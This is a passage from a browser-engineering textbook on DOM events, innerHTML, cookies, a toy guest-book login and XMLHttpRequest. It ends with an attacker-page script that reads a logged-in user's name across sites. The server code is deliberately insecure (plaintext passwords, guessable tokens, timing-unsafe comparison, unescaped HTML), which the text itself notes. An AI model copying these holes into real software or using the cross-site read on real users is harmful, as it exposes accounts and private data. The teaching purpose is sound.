        elt = self.handle_to_node[handle]
        return elt.attributes.get(attr, None)
Note that if the attribute is not assigned, the get method will return None, which DukPy will translate to JavaScript’s null. Don’t forget to export this function as getAttribute.
We finally have enough of the DOM API to implement a little character count function for text areas:
var inputs = document.querySelectorAll('input')
for (var i = 0; i < inputs.length; i++) {
    var name = inputs[i].getAttribute("name");
    var value = inputs[i].getAttribute("value");
    if (value.length > 100) {
        console.log("Input " + name + " has too much text.")
    }
}
Ideally, though, we’d update the character count every time the user types into an input box, but that requires running JavaScript on every key press. Let’s implement that next.
Node objects in JavaScript correspond to Element nodes in the browser. They thus have JavaScript object properties as well as HTML attributes. They’re easy to confuse, and to make matters worse, many JavaScript object properties reflect attribute values automatically. For example, the id property on Node objects gives read-write access to the id attribute of the underlying Element. This is very convenient, and avoids calling setAttribute and getAttribute all over the place. But this reflection only applies to certain fields; setting made-up JavaScript properties won’t create corresponding HTML attributes, nor vice versa.
The browser executes JavaScript code as soon as it loads the web page, but that code often wants to change the page in response to user actions.
Here’s how that works. Any time the user interacts with the page, the browser generates events. Each event has a type, like change, click, or submit, and happens at a target element. The addEventListener method allows JavaScript to react to those events: node.addEventListener('click', func) sets func to run every time the element corresponding to node generates a click event. It’s basically Tk’s bind, but in the browser. Let’s implement it.
Let’s start with generating events. I’ll create a dispatch_event method and call it whenever an event is generated. That includes, first of all, any time we click in the page:
class Tab:
    def click(self, x, y):
        # ...
        elif elt.tag == "a" and "href" in elt.attributes:
            self.js.dispatch_event("click", elt)
            # ...
        elif elt.tag == "input":
            self.js.dispatch_event("click", elt)
            # ...
        elif elt.tag == "button":
            self.js.dispatch_event("click", elt)
            # ...
        # ...
Second, before updating input area values:
class Tab:
    def keypress(self, char):
        if self.focus:
            self.js.dispatch_event("keydown", self.focus)
            # ...
And finally, when submitting forms but before actually sending the request to the server:
def submit_form(self, elt):
    self.js.dispatch_event("submit", elt)
    # ...
So far so good—but what should the dispatch_event method do? Well, it needs to run listeners passed to addEventListener, so those need to be stored somewhere. Since those listeners are JavaScript functions, we need to keep that data on the JavaScript side, in a variable in the runtime. I’ll call that variable LISTENERS; we’ll use it to look up handles and event types, so let’s make it map handles to a dictionary that maps event types to a list of listeners:
LISTENERS = {}

Node.prototype.addEventListener = function(type, listener) {
    if (!LISTENERS[this.handle]) LISTENERS[this.handle] = {};
    var dict = LISTENERS[this.handle];
    if (!dict[type]) dict[type] = [];
    var list = dict[type];
    list.push(listener);
}
To dispatch an event, we need to look up the type and handle in the
LISTENERS
array, like this:
Node.prototype.dispatchEvent = function(type) {
    var handle = this.handle;
    var list = (LISTENERS[handle] && LISTENERS[handle][type]) || [];
    for (var i = 0; i < list.length; i++) {
        list[i].call(this);
    }
}
Note that dispatchEvent
uses the call
method on functions, which sets the value of this
inside
that function. As is standard in JavaScript, I’m setting it to the node
that the event was generated on.
When an event occurs, the browser calls dispatchEvent
from Python:
class JSContext:
    def dispatch_event(self, type, elt):
        handle = self.node_to_handle.get(elt, -1)
        self.interp.evaljs(
            EVENT_DISPATCH_CODE, type=type, handle=handle)
Here the EVENT_DISPATCH_CODE
constant is a string of
JavaScript code that dispatches a new event:
EVENT_DISPATCH_CODE = \
    "new Node(dukpy.handle).dispatchEvent(dukpy.type)"
So when dispatch_event
is called on the Python side,
that runs dispatchEvent
on the JavaScript side, and that in
turn runs all of the event listeners. The dukpy
JavaScript
object in this code snippet stores the named type
and
handle
arguments to evaljs
.
With all this event-handling machinery in place, we can update the character count every time an input area changes:
function lengthCheck() {
    var name = this.getAttribute("name");
    var value = this.getAttribute("value");
    if (value.length > 100) {
        console.log("Input " + name + " has too much text.");
    }
}

var inputs = document.querySelectorAll("input");
for (var i = 0; i < inputs.length; i++) {
    inputs[i].addEventListener("keydown", lengthCheck);
}
Note that lengthCheck
uses this
to
reference the input element that actually changed, as set up by
dispatchEvent
.
So far so good—but ideally the length check wouldn’t print to the console; it would add a warning to the web page itself. To do that, we’ll need to not only read from the page but also modify it.
So far we’ve implemented read-only DOM methods; now we need methods
that change the page. The full DOM API provides a lot of such methods,
but for simplicity I’m going to implement only innerHTML
,
which is used like this:
node.innerHTML = "This is my <b>new</b> bit of content!";
In other words, innerHTML
is a property of node
objects, with a setter that is run when the field is modified.
That setter takes the new value, which must be a string, parses it as
HTML, and makes the new, parsed HTML nodes children of the original
node.
Let’s implement this, starting on the JavaScript side. JavaScript has
the obscure Object.defineProperty
function to define
setters, which DukPy supports:
Object.defineProperty(Node.prototype, 'innerHTML', {
    set: function(s) {
        call_python("innerHTML_set", this.handle, s.toString());
    }
});
In innerHTML_set
, we’ll need to parse the HTML string.
That turns out to be trickier than you’d think, because our browser’s
HTML parser is intended to parse whole HTML documents, not these
document fragments. As an expedient, close-enough hack,Real browsers follow the standardized
parsing algorithm for HTML fragments. I’ll just wrap
the HTML in an html
and body
element:
def innerHTML_set(self, handle, s):
    doc = HTMLParser("<html><body>" + s + "</body></html>").parse()
    new_nodes = doc.children[0].children
Don’t forget to export the innerHTML_set
function. Note
that we extract all children of the body
element, because
an innerHTML_set
call can create multiple nodes at a time.
These new nodes must now be made children of the element
innerHTML_set
was called on:
def innerHTML_set(self, handle, s):
    # ...
    elt = self.handle_to_node[handle]
    elt.children = new_nodes
    for child in elt.children:
        child.parent = elt
We update the parent pointers of those parsed child nodes because
otherwise they would point to the dummy body
element that
we added to aid parsing.
It might look like we’re done—but try this out and you’ll realize
that nothing happens when a script calls innerHTML_set
.
That’s because, while we have changed the HTML tree, we haven’t
regenerated the layout tree or the display list, so the browser is still
showing the old page.
Whenever the page changes, we need to update its rendering by calling
render
:Redoing layout for the whole page is often wasteful; Chapter 16 explores more complicated
algorithms to speed this up.
class JSContext:
    def innerHTML_set(self, handle, s):
        # ...
        self.tab.render()
JavaScript can now modify the web page!Note that while rendering will update to account for the new HTML, any added scripts or style sheets will not properly load, and removed style sheets will (incorrectly) still apply. I’ve left fixing that to an exercise.
Let’s try this out in our guest book. To prevent long rants, I want a 100-character limit on guest book entries.
First, switch to the server codebase and add a
<label>
after the guest book form. Initially this
label will be empty, but we’ll write an error message into it if the
paragraph gets too long.
def show_comments():
    # ...
    out += "<label></label>"
    # ...
Also add a script to the page:
def show_comments():
    # ...
    out += "<script src=/comment.js></script>"
    # ...
Now the browser will request comment.js
, so our server
needs to serve that JavaScript file:
def do_request(method, url, headers, body):
    # ...
    elif method == "GET" and url == "/comment.js":
        with open("comment.js") as f:
            return "200 OK", f.read()
    # ...
We can then put our little input length checker into
comment.js
, with the lengthCheck
function
modified to use innerHTML
:
var label = document.querySelectorAll("label")[0];

function lengthCheck() {
    var value = this.getAttribute("value");
    if (value.length > 100) {
        label.innerHTML = "Comment too long!";
    }
}

var inputs = document.querySelectorAll("input");
for (var i = 0; i < inputs.length; i++) {
    inputs[i].addEventListener("keydown", lengthCheck);
}
Try it out: write a long comment and you should see the page warning
you that the comment is too long. By the way, we might want to make it
stand out more, so let’s go ahead and add another URL to our web server,
/comment.css
, with the contents:
label { font-weight: bold; color: red; }
Add a link
to the guest book page so that this style
sheet is loaded.
But even though we tell the user that their comment is too long, the user can submit the guest book entry anyway. Oops! Let’s fix that.
This code has a subtle memory leak: if you access an HTML element
from JavaScript (thereby creating a handle for it) and then remove the
element from the page (using innerHTML
), Python won’t be
able to garbage-collect the Element
object because it is
still stored in the node_to_handle
map. And that’s good, if
JavaScript can still access that Element
via its handle,
but bad otherwise. Solving this is quite tricky, because it requires the
Python and JavaScript garbage collectors to cooperate.
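The leak described in this aside can be demonstrated with a weak reference. This is a standalone sketch, not the book's code; `node_to_handle` here is a bare dictionary standing in for the browser's handle map:

```python
# Sketch: a node_to_handle-style map keeps an Element alive even after
# the page itself no longer references it.
import gc
import weakref

class Element:
    pass

node_to_handle = {}

elt = Element()
node_to_handle[elt] = 0        # JavaScript was handed a handle
probe = weakref.ref(elt)

del elt                        # the page drops its reference
gc.collect()
alive_after_del = probe() is not None    # True: the map holds it

node_to_handle.clear()         # what a cooperating collector would do
gc.collect()
alive_after_clear = probe() is not None  # False: now collectible
```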
So far, when an event is generated, the browser will run the listeners, and then also do whatever it normally does for that event—the default action. I’d now like JavaScript code to be able to cancel that default action.
There are a few steps involved. First of all, event listeners should
receive an event object as an argument. That object should have
a preventDefault
method. When that method is called, the
default action shouldn’t occur.
First of all, we’ll need event objects. Back to our JavaScript runtime:
function Event(type) {
    this.type = type;
    this.do_default = true;
}

Event.prototype.preventDefault = function() {
    this.do_default = false;
}
Note the do_default
field, to record whether
preventDefault
has been called. We’ll now be passing an
Event
object to dispatchEvent
, instead of just
the event type:
Node.prototype.dispatchEvent = function(evt) {
    var type = evt.type;
    // ...
    for (var i = 0; i < list.length; i++) {
        list[i].call(this, evt);
    }
    // ...
    return evt.do_default;
}
In Python, we now need to create an Event
to pass to
dispatchEvent
:
EVENT_DISPATCH_CODE = \
    "new Node(dukpy.handle).dispatchEvent(new Event(dukpy.type))"
Also note that dispatchEvent
returns
evt.do_default
, which is not only standard in JavaScript
but also helpful when dispatching events from Python, because Python’s
dispatch_event
can return that boolean to its handler:
class JSContext:
    def dispatch_event(self, type, elt):
        # ...
        do_default = self.interp.evaljs(
            EVENT_DISPATCH_CODE, type=type, handle=handle)
        return not do_default
This way, every time an event happens, the browser can check the
return value of dispatch_event
and stop if it is
True
. We have three such places in the click
method:
class Tab:
    def click(self, x, y):
        while elt:
            # ...
            elif elt.tag == "a" and "href" in elt.attributes:
                if self.js.dispatch_event("click", elt): return
                # ...
            elif elt.tag == "input":
                if self.js.dispatch_event("click", elt): return
                # ...
            elif elt.tag == "button":
                if self.js.dispatch_event("click", elt): return
                # ...
            # ...
        # ...
And one in submit_form
:
class Tab:
    def submit_form(self, elt):
        if self.js.dispatch_event("submit", elt): return
And one in keypress
:
class Tab:
    def keypress(self, char):
        if self.focus:
            if self.js.dispatch_event("keydown", self.focus): return
Now our character count code can prevent the user from submitting a form. It can use a global variable to track whether submission is allowed; when submission is attempted, it checks that variable and cancels the submission if necessary:
var allow_submit = true;

function lengthCheck() {
    // ...
    allow_submit = value.length <= 100;
    if (!allow_submit) {
        // ...
    }
}

var form = document.querySelectorAll("form")[0];
form.addEventListener("submit", function(e) {
    if (!allow_submit) e.preventDefault();
});
This way it’s impossible to submit the form when the comment is too long!
Well… Impossible in this browser. But since there are browsers that don’t run JavaScript (like ours, one chapter back), we should check the length on the server side too:
def add_entry(params):
    if 'guest' in params and len(params['guest']) <= 100:
        ENTRIES.append(params['guest'])
    return show_comments()
Note that while our guest book is enhanced by JavaScript, it still uses HTML, CSS, form elements and all the other features we’ve built so far into our browser. This is in contrast to the recently-departed Adobe Flash, and before that Java Applets, which were self-contained plug-ins that handled input and rendering with their own technologies.
Because JavaScript builds on top of HTML and CSS, it allows web applications to go beyond what is built into the browser, similar in some ways to a browser extension. Ideally, web pages should be written so that they work correctly without JavaScript, but work better with it—this is the concept of progressive enhancement. In addition to supporting more browsers, progressive enhancement saves you from needing to re-invent HTML and CSS—even now that you know how.
JavaScript first
appeared in 1995, as part of Netscape Navigator. Its name was chosen
to indicate a similarity to the Java
language, and the syntax is Java-esque for that reason. However, under
the surface JavaScript is a much more dynamic language than Java, as is
appropriate given its role as a progressive enhancement mechanism for
the web. For example, any method or property on any object (including
built-in ones like Element
) can be dynamically overridden
at any time. This makes it possible to polyfill
differences between browsers, adding features that look built-in to
other JavaScript code.
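Python allows similar runtime patching, which makes for a rough analogue of a polyfill. This sketch is mine, not the book's; the `matches` method here is made up:

```python
# Sketch of polyfilling, translated to Python: if a class lacks a
# method, patch one in at runtime; callers can't tell the difference.
class Node:
    def __init__(self, tag):
        self.tag = tag

if not hasattr(Node, "matches"):
    def matches(self, tag):
        return self.tag == tag
    Node.matches = matches  # now looks built-in to other code

n = Node("a")
```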
Our browser now runs JavaScript applications on behalf of websites. Granted, it supports just four methods from the vast DOM API, but even those are enough to demonstrate the possibilities.
A web page can now add functionality via a clever script, instead of waiting for a browser developer to add it into the browser itself. And as a side-benefit, a web page can now earn the lofty title of “web application”.
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
def tree_to_list(tree, list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
CHROME_PX
class URL:
def __init__(url)
def request(payload)
def resolve(url)
class Element:
def __init__(tag, attributes, parent)
def __repr__()
class Text:
def __init__(text, parent)
def __repr__()
class Browser:
def __init__()
def handle_down(e)
def handle_click(e)
def handle_key(e)
def handle_enter(e)
def load(url)
def paint_chrome()
def draw()
class Tab:
def __init__()
def load(url, body)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
def render()
def submit_form(elt)
def keypress(char)
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
def input(node)
class InputLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
INPUT_WIDTH_PX
EVENT_DISPATCH_CODE
class JSContext:
def __init__(tab)
def run(code)
def dispatch_event(type, elt)
def get_handle(elt)
def querySelectorAll(selector_text)
def getAttribute(handle, attr)
def innerHTML_set(handle, s)
if __name__ == "__main__"
The server’s outline is unchanged from the last chapter:
def handle_connection(conx)
def do_request(method, url, headers, body)
def form_decode(body)
ENTRIES
def show_comments()
def not_found(url, method)
def add_entry(params)
if __name__ == "__main__"
If you run it, it should look something like this page; due to the browser sandbox, you will need to open that page in a new tab.
Node.children: Add support for the children
property on JavaScript Node
s. Node.children
returns the immediate Element
children of a node, as an
array. Text
children are not included.The DOM method
childNodes
gives access to both elements and
text.
createElement: The document.createElement
method creates a new element, which can be attached to the
document with the appendChild
and insertBefore
methods on Node
s; unlike innerHTML
, there’s no
parsing involved. Implement all three methods.
removeChild: The removeChild
method on Node
s detaches the provided child and returns it,
bringing that child—and its subtree—back into a detached
state. (It can then be re-attached elsewhere, with
appendChild
and insertBefore
, or deleted.)
Implement this method. It’s more challenging to implement this one,
because you’ll need to also remove the subtree from the Python side, and
delete any layout objects associated with it.
IDs: When an HTML element has an id
attribute,
a JavaScript variable pointing to that element is predefined. So, if a
page has a <div id="foo"></div>
, then there’s a
variable foo
referring to that node.This is standard
behavior. Implement this in your browser. Make sure to
handle the case of nodes being added and removed (such as with
innerHTML
).
Event Bubbling: Right now, you can attach a
click
handler to a
(anchor) elements, but not
to anything else. Fix this. One challenge you’ll face is that when you
click on an element, you also click on all its ancestors. On the web,
this sort of quirk is handled by event
bubbling: when an event is generated on an element, listeners
are run not just on that element but also on its ancestors. Implement
event bubbling, and make sure listeners can call
stopPropagation
on the event object to stop bubbling the
event up the tree. Double-check that clicking on links still works, and
make sure preventDefault
still successfully prevents clicks
on a link from actually following the link.
Inline styling: The style
property of a
JavaScript Node
object contains a CSSStyleDeclaration
object. Setting any property on this object should add or modify CSS
properties from the element’s inline style (as in its style
attribute). Dashes in CSS property names become camel case; the
background-color
CSS property is called
backgroundColor
in JavaScript. Implement the
style
property.
Serializing HTML: Reading from innerHTML
should return a string containing HTML source code. That source code
should reflect the current attributes of the element; for
example:
element.innerHTML = '<span id=foo>Chris was here</span>';
element.id = 'bar';
// Prints "<span id=bar>Chris was here</span>":
console.log(element.innerHTML);
Implement this behavior for innerHTML
as a getter. Also
implement outerHTML
, which differs from
innerHTML
in that it contains the element itself, not just
its children.
Script-added scripts and style sheets: The
innerHTML
API could cause <script>
or
<link>
elements to be added to the document, but
currently our browser does not load them when this happens. Fix this.
Likewise, when a <link>
element is removed from the
document, its style sheet should be removed from the global list;
implement that as well.Note that, unlike a style sheet, a removed
<script>
’s evaluated code still exists for the
lifetime of the web page. Can you see why it has to be that
way?
Our browser has grown up and now runs (small) web applications. With one final step—user identity via cookies—it will be able to run all sorts of personalized online services. But capability demands responsibility: our browser must now secure cookies against adversaries interested in stealing them. Luckily, browsers have sophisticated systems for controlling access to cookies and preventing their misuse.
Web security is a vast topic, covering browser, network, and applications security. It also involves educating the user, so that attackers can’t mislead them into revealing their own secure data. This chapter can’t cover all of that: if you’re writing web applications or other security-sensitive code, this book is not enough.
With what we’ve implemented so far there’s no way for a web server to tell whether two HTTP requests come from the same user or from two different ones: our browser is effectively anonymous.I don’t mean anonymous against malicious attackers, who might use browser fingerprinting or similar techniques to tell users apart. I mean anonymous in the good-faith sense. That means it can’t “log in” anywhere, since a logged-in user’s requests would be indistinguishable from those of not-logged-in users.
The web fixes this problem with cookies. A cookie—the name is meaningless, ignore it—is a little bit of information stored by your browser on behalf of a web server. The cookie distinguishes your browser, and is sent with each web request so the server can distinguish which requests come from which user.
Here are the technical details. In the HTTP response a server can send
a Set-Cookie
header. This header contains a key-value pair;
for example, the following header sets the value of the foo
cookie to bar
:
Set-Cookie: foo=bar
The browser remembers this key-value pair, and the next time it makes
a request to the same server (cookies are site-specific), the browser
echoes it back in the Cookie
header:
Cookie: foo=bar
Servers can also set multiple cookies and set parameters like
expiration dates, but this Set-Cookie
/ Cookie
mechanism is the core principle.
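That round trip can be sketched in a few lines. The helper names here are mine, not the book's, and this handles only a single bare key-value pair:

```python
# Sketch: parse a Set-Cookie value, then echo it back as a Cookie
# header on the next request to the same server.
def parse_set_cookie(header_value):
    key, _, value = header_value.partition("=")
    return key, value

def make_cookie_header(key, value):
    return "Cookie: {}={}\r\n".format(key, value)

key, value = parse_set_cookie("foo=bar")
header = make_cookie_header(key, value)  # "Cookie: foo=bar\r\n"
```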
Servers use cookies to assign identities to their users. Let’s use
cookies to write a login system for our guest book. Each user will be
identified by a long random number stored in the token
cookie.This
random.random
call returns a decimal number with 53 bits of
randomness. That’s not great; 256 bits is ideal. And
random.random
is not a secure random number generator: by
observing enough tokens you can predict future values and use those to
hijack accounts. A real web application must use a cryptographically
secure random number generator for tokens. The server will
either extract a token from the Cookie
header, or generate
a new one for new visitors:
import random

def handle_connection(conx):
    # ...
    if "cookie" in headers:
        token = headers["cookie"][len("token="):]
    else:
        token = str(random.random())[2:]
    # ...
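As the footnote warns, random.random is not suitable for real tokens. Python's standard-library secrets module is; a sketch of the swap (not the book's code) might look like this:

```python
# Sketch: a cryptographically secure 256-bit session token.
import secrets

def new_token():
    return secrets.token_hex(32)  # 32 bytes = 256 bits, hex-encoded

token = new_token()
```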
Of course, new visitors need to be told to remember their newly-generated token:
def handle_connection(conx):
    # ...
    if 'cookie' not in headers:
        template = "Set-Cookie: token={}\r\n"
        response += template.format(token)
    # ...
The first code block runs after all the request headers are parsed,
before handling the request in do_request
, while the second
code block runs after do_request
returns, when the server
is assembling the HTTP response.
With these two code changes, each visitor to the guest book now has a
unique identity. We can now use that identity to store information about
each user. Let’s do that in a server side SESSIONS
variable:Browsers and
servers both limit header lengths, so it’s best to store minimal data in
cookies. Plus, cookies are sent back and forth on every request, so long
cookies mean a lot of useless traffic. It’s therefore wise to store user
data on the server, and only store a pointer to that data in the cookie.
And, since cookies are stored by the browser, they can be changed
arbitrarily by the user, so it would be insecure to trust the cookie
data.
SESSIONS = {}

def handle_connection(conx):
    # ...
    session = SESSIONS.setdefault(token, {})
    status, body = do_request(session, method, url, headers, body)
    # ...
SESSIONS
maps tokens to session data dictionaries. I’m
passing that session data via do_request
to individual
pages like show_comments
and add_entry
:
def do_request(session, method, url, headers, body):
    if method == "GET" and url == "/":
        return "200 OK", show_comments(session)
    # ...
    elif method == "POST" and url == "/add":
        params = form_decode(body)
        add_entry(session, params)
        return "200 OK", show_comments(session)
    # ...
You’ll need to modify the argument lists for add_entry
and show_comments
to accept this new argument. We now have
the foundation upon which to build a login system.
The original specification for cookies says there is “no compelling reason” for calling them “cookies”, but in fact using this term for opaque identifiers exchanged between programs seems to date way back; Wikipedia traces it back to at least 1979, and cookies were used in X11 for authentication before they were used on the web.
I want users to log in before posting to the guest book. Minimally, that means users must sign in with a username and password, and only logged-in users can post comments.
Let’s start coding. First, we’ll need to store usernames in
ENTRIES
:The
pre-loaded comments reference 1995’s Hackers. Hack the Planet!
ENTRIES = [
    ("No names. We are nameless!", "cerealkiller"),
    ("HACK THE PLANET!!!", "crashoverride"),
]
Each user will also have a password:
LOGINS = {
    "crashoverride": "0cool",
    "cerealkiller": "emmanuel"
}
When we print the guest book entries, we’ll write who authored them:
def show_comments(session):
    # ...
    for entry, who in ENTRIES:
        out += "<p>" + entry + "\n"
        out += "<i>by " + who + "</i></p>"
    # ...
Now, let’s handle logging in. We’ll determine whether a user is
logged in using the user
key in the session data, and use
that to show either the comment form or a login link:
def show_comments(session):
    # ...
    if "user" in session:
        out += "<h1>Hello, " + session["user"] + "</h1>"
        out += "<form action=add method=post>"
        out += "<p><input name=guest></p>"
        out += "<p><button>Sign the book!</button></p>"
        out += "</form>"
    else:
        out += "<a href=/login>Sign in to write in the guest book</a>"
    # ...
Likewise, add_entry
must check that the user is logged
in before posting comments:
def add_entry(session, params):
    if "user" not in session: return
    if 'guest' in params and len(params['guest']) <= 100:
        ENTRIES.append((params['guest'], session["user"]))
Note that the username from the session is stored into
ENTRIES
.
Since the session data (including the user
key) is
stored on the server, users can’t modify it directly. That’s good,
because we only want to set the user
key in the session
data if users supply the right password in the login form.
Let’s build that login form. We’ll need a handler for
/login
:
def do_request(session, method, url, headers, body):
    # ...
    elif method == "GET" and url == "/login":
        return "200 OK", login_form(session)
    # ...
This URL shows a form with a username and a password field:I’ve given the
password
input area the type password
, which
in a real browser will draw stars or dots instead of showing what you’ve
entered, though our browser doesn’t do that.
def login_form(session):
    body = "<!doctype html>"
    body += "<form action=/ method=post>"
    body += "<p>Username: <input name=username></p>"
    body += "<p>Password: <input name=password type=password></p>"
    body += "<p><button>Log in</button></p>"
    body += "</form>"
    return body
Note that the form POST
s its data to the /
URL. We’ll want to handle these POST
requests in a new
function that checks passwords and does logins:
def do_request(session, method, url, headers, body):
    # ...
    elif method == "POST" and url == "/":
        params = form_decode(body)
        return do_login(session, params)
    # ...
This do_login
function checks passwords and logs people
in by storing their user name in the session data:Actually, using
==
to compare passwords like this is a bad idea: Python’s
equality function for strings scans the string from left to right, and
exits as soon as it finds a difference. Therefore, you get a clue about
the password from how long it takes to check a password guess;
this is called a timing side
channel. This book is about the browser, not the server, but a real
web application has to do a constant-time
string comparison!
def do_login(session, params):
    username = params.get("username")
    password = params.get("password")
    if username in LOGINS and LOGINS[username] == password:
        session["user"] = username
        return "200 OK", show_comments(session)
    else:
        out = "<!doctype html>"
        out += "<h1>Invalid password for {}</h1>".format(username)
        return "401 Unauthorized", out
Try it out in a normal web browser. You should be able to go to the
main guest book page, click the link to log in, log in with one of the
username/password pairs above, and then be able to post entries.The login flow slows down
debugging. You might want to add the empty string as a username/password
pair. Of course, this login system has a whole slew of
insecurities.The
insecurities include not hashing passwords, not using bcrypt
,
not allowing password changes, not having a “forget your password” flow,
not forcing TLS, not sandboxing the server, and many many
others. But the focus of this book is the browser, not the
server, so once you’re sure it’s all working, let’s switch back to our
web browser and implement cookies.
A more obscure browser authentication system is TLS
client certificates. The user downloads a public/private key pair
from the server, and the browser then uses them to prove who it is on
later requests to that server. Also, if you’ve ever seen a URL with
username:password@
before the hostname, that’s HTTP
authentication. Please don’t use either method in new websites
(without a good reason).
To start, we need a place in the browser that stores cookies; that data structure is traditionally called a cookie jar:Because once you have one silly name it’s important to stay on-brand.
COOKIE_JAR = {}
Since cookies are site-specific, our cookie jar will map sites to cookies. Note that the cookie jar is global, not limited to a particular tab. That means that if you’re logged in to a website and you open a second tab, you’re logged in on that tab as well.
When the browser visits a page, it needs to send the cookie for that site:
class URL:
    def request(self, payload=None):
        # ...
        if self.host in COOKIE_JAR:
            cookie = COOKIE_JAR[self.host]
            body += "Cookie: {}\r\n".format(cookie)
        # ...
Symmetrically, the browser has to update the cookie jar when it sees
a Set-Cookie
header:A server can actually send multiple Set-Cookie
headers to set multiple cookies in one request.
class URL:
    def request(self, payload=None):
        # ...
        if "set-cookie" in headers:
            kv = headers["set-cookie"]
            COOKIE_JAR[self.host] = kv
        # ...
You should now be able to use your toy browser to log in to the guest book and post to it. Moreover, you should be able to open the guest book in two browsers simultaneously—maybe your toy browser and a real browser as well—and log in and post as two different users.
Note that request
can be called multiple times to load a
web page’s HTML, CSS, and JavaScript resources. Later requests transmit
cookies set by previous responses, so for example our guest book sets a
cookie when the browser first requests the page and then receives that
cookie when our browser later requests the page’s CSS file.
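That persistence across requests can be simulated in a toy form. This sketch is mine, not the book's; `fake_request` stands in for the real request method:

```python
# Sketch: a global jar persists across requests, so the second request
# to a host sends back the cookie the first response set.
COOKIE_JAR = {}

def fake_request(host, set_cookie=None):
    sent = COOKIE_JAR.get(host)          # Cookie value we'd transmit
    if set_cookie:
        COOKIE_JAR[host] = set_cookie    # remember the Set-Cookie reply
    return sent

first = fake_request("example.org", set_cookie="token=abc123")
second = fake_request("example.org")     # echoes the stored cookie
```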
Now that our browser supports cookies and uses them for logins, we
need to make sure cookie data is safe from malicious actors. After all:
if someone stole your token
cookie, they could copy it into
their browser, and the server would think they are you. We need to
prevent that.
At one point, an attempt was made to “clean up” the cookie
specification in RFC 2965,
including human-readable cookie descriptions and cookies restricted to
certain ports. This required introducing the Cookie2
and
Set-Cookie2
headers; the new headers were not popular. They
are now obsolete.
Cookies are site-specific, so one server shouldn’t be sent another server’s cookies.Well… Our connection isn’t encrypted, so an attacker could read it from an open Wi-Fi connection. But another server couldn’t.Well… Another server could hijack our DNS and redirect our hostname to a different IP address, and then steal our cookies. Some ISPs support DNSSEC, which prevents this, but not all.Well… A state-level attacker could announce fraudulent BGP routes, which would send even a correctly-retrieved IP address to the wrong physical computer.Security is very hard. But if an attacker is clever, they might be able to get the server or the browser to help them steal cookie values.
The easiest way for an attacker to steal your private data is to ask
for it. Of course, there’s no API in the browser for a website to ask
for another website’s cookies. But there is an API to make
requests to another website. It’s called
XMLHttpRequest
.It’s a weird name! Why is XML
capitalized but
not Http
? And it’s not restricted to XML! Ultimately, the
naming is historical,
dating back to Microsoft’s “Outlook Web Access” feature for Exchange
Server 2000.
XMLHttpRequest
sends asynchronous HTTP requests from
JavaScript. Since I’m using XMLHttpRequest
just to
illustrate security issues, I’ll implement a minimal version here.
Specifically, I’ll support only synchronous HTTP requests.Synchronous
XMLHttpRequests
are slowly moving through deprecation and
obsolescence, but I’m using them here because they are easier to
implement. Using this minimal XMLHttpRequest
looks like this:
x = new XMLHttpRequest();
x.open("GET", url, false);
x.send();
// use x.responseText
We’ll define the XMLHttpRequest
objects and methods in
JavaScript. The open
method will just save the method and
URL:XMLHttpRequest
has more options not
implemented here, like support for usernames and passwords. This code is
also missing some error checking, like making sure the method is a valid
HTTP method supported by our browser.
function XMLHttpRequest() {}

XMLHttpRequest.prototype.open = function(method, url, is_async) {
    if (is_async) throw Error("Asynchronous XHR is not supported");
    this.method = method;
    this.url = url;
}
The send
method calls an exported function:As above, this implementation
skips important XMLHttpRequest
features, like setting
request headers (and reading response headers), changing the response
type, or triggering various events and callbacks during the
request.
XMLHttpRequest.prototype.send = function(body) {
    this.responseText = call_python("XMLHttpRequest_send",
        this.method, this.url, body);
}
The XMLHttpRequest_send
function just calls
request
:Note that the method
argument is ignored,
because our request
function chooses the method on its own
based on whether a payload is passed. This doesn’t match the standard
(which allows POST
requests with no payload), and I’m only
doing it here for convenience.
class JSContext:
    def XMLHttpRequest_send(self, method, url, body):
        full_url = self.tab.url.resolve(url)
        headers, out = full_url.request(body)
        return out
With XMLHttpRequest
, a web page can make HTTP requests
in response to user actions, making websites more interactive! This API,
and newer analogs like fetch
,
are how websites let you like a post, see hover previews, or
submit a form without reloading.
XMLHttpRequest
objects have setRequestHeader
and getResponseHeader
methods to control HTTP headers. However, this could allow a script to
interfere with the cookie mechanism or with other security measures, so
some request
and response
headers are not accessible from JavaScript.
However, new capabilities lead to new responsibilities. HTTP requests
sent with XMLHttpRequest
include cookies. This is by
design: when you “like” something, the server needs to associate the
“like” to your account. But it also means that
XMLHttpRequest
can access private data, which we therefore need to
protect.
Let’s imagine an attacker wants to know your username on our guest book server. When you’re logged in, the guest book includes your username on the page (where it says “Hello, so and so”), so reading the guest book with your cookies is enough to determine your username.
With XMLHttpRequest
, an attacker’s websiteWhy is the user on the
attacker’s site? Perhaps it has funny memes, or it’s been hacked and is
being used for the attack against its will, or perhaps the evil-doer
paid for ads on sketchy websites where users have low standards for
security anyway. could request the guest book page:
x = new XMLHttpRequest();
x.open("GET", "http://localhost:8000/", false);
x.send();
user = x.responseText.split(" ")[2].split("<")[0];
